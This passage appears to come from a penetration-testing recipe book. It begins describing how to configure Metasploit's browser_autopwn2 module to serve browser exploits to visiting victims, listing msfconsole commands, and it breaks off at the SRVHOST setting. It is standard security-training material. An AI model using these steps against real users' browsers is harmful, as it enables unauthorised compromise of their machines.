Using Metasploit's browser_autopwn2 to attack a client

Metasploit Framework includes a huge collection of client-side exploits, many of which target known vulnerabilities in web browsers. It also includes a module that detects the version of the browser the client is using and picks the best exploit to trigger: browser_autopwn, or browser_autopwn2 in its newest version.

In this recipe, we will set up an attack with browser_autopwn2 and get it ready for a victim to come in.

How to do it...

  1. Start msfconsole.
  2. We will use version 2 of Browser Autopwn (BAP2):
    use auxiliary/server/browser_autopwn2
    
  3. Let's take a look at what configurable options it has:
    show options
    
  4. We will set our Kali server to receive connections:
    set SRVHOST ...
